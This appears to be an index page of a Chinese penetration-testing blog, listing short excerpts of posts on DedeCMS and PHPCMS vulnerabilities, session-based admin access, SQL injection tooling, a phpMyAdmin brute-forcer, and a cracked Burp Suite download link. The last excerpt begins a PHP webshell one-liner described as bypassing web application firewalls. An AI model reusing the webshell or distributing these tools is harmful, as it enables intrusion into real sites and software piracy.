暗月博客|网络安全,WEB渗透,数据安全,渗透编程,安全培训

利用SESSION登录后台

mOon    原创作品     3601次查看    抢沙发    2018年05月02日

利用SESSION登录后台 1、科普 session有什么用:用于用户登录权限验证。 例如当php开启seesion的时候,只要有人访问网站就会生成seesion在php设置好的tmp目录下。 这个seesion我们浏览器同样的可以获取到的。例如访问当前织梦网站: 就会在当然浏览器保存一个cookie 这个c...

thinkphp5_log thinkphp5 日志扫描工具

mOon    原创作品     2854次查看    抢沙发    2018年05月02日

hinkphp5_log thinkphp5日志扫描工具 这个版本是thinkphp5的 thinkphp3的日志扫描工具 版本请在这里下载 https://www.92moon.com/post-62.html thinkphp5_log.py http://www.thinkphps.com/ 2018 www.thinkphps.c...

PHPCMSv9逻辑漏洞导致备份文件名可猜测

mOon    漏洞收集     2413次查看    抢沙发    2018年03月09日

    简要描述     一处逻辑漏洞导致备份文件名可猜测,影响phpcmsv9所有版本。 一、漏洞原理 我们知道windows的FindFirstFile(API)有个特性就是可以把<<当成通配符来用而PHP的opendir(win32readdir.c)就使用了该API。PHP的文件操作函数均调用了ope...

某CMS V5.7 SP2 后台Getshell

mOon    漏洞收集     3064次查看    抢沙发    2018年02月27日

dede/sys_info.php中 //保存配置的改动 if($dopost=="save") {     if(!isset($token)){         echo 'No token found!';       &...

解决DEDECMS历史难题--找后台目录

mOon    漏洞收集     2817次查看    抢沙发    2018年02月27日

利用限制 仅针对windows系统 进入正题 首先看核心文件common.inc.php 大概148行左右 if($_FILES) { require_once(DEDEINC.'/uploadsafe.inc.php'); } uploadsafe.inc.php if( preg_match('#^(cf...

phpMyAdmin暴力破解v1.3

mOon    神器下载     4600次查看    抢沙发    2018年02月06日

phpMyAdmin暴力破解v1.3 phpMyAdmin暴力破解v1.3.zip

【原创】AngelSword(天使之剑)漏洞框架的使用

mOon    原创作品     28026次查看    抢沙发    2018年01月22日

【原创】AngelSword(天使之剑)漏洞框架的使用 本公众号不定期更新教程和安全相关文章 还没关注的赶快关注。 安装setuptools     wget --no-check-certificate  https://pypi.python.org/packages/source/s/set...

【原创】(PHP+MYSQL(延时注入和注入工具编写)

mOon    原创作品     3140次查看    抢沙发    2018年01月20日

【原创】(PHP+MYSQL(延时注入和注入工具编写) 【原创】(PHP+MYSQL(延时注入和注入工具编写) 这是以前培训录制的一个课程 现在分享出来给大家学习吧。 延时注入 等于时间差注入   延时...

Burp1.7.26 永久版本

mOon    神器下载     5739次查看    抢沙发    2017年12月09日

Burp1.7.26 永久版本 链接:https://pan.baidu.com/s/1eR3Myrg 密码:3fnb

过狗过云锁一句话

mOon    原创作品     4417次查看    抢沙发    2017年12月08日

这几个月 没什么东西写 东西都是转载 哈哈哈 最近更新一些原创吧。 今天在群里面看到一些机油讨论一些话题。 看到一个据说是过狗过云锁的一句话。 <?php error_reporting(0);set_time_limit(0);$a=$_POST["x"];if($a){$a=str_replace(array(...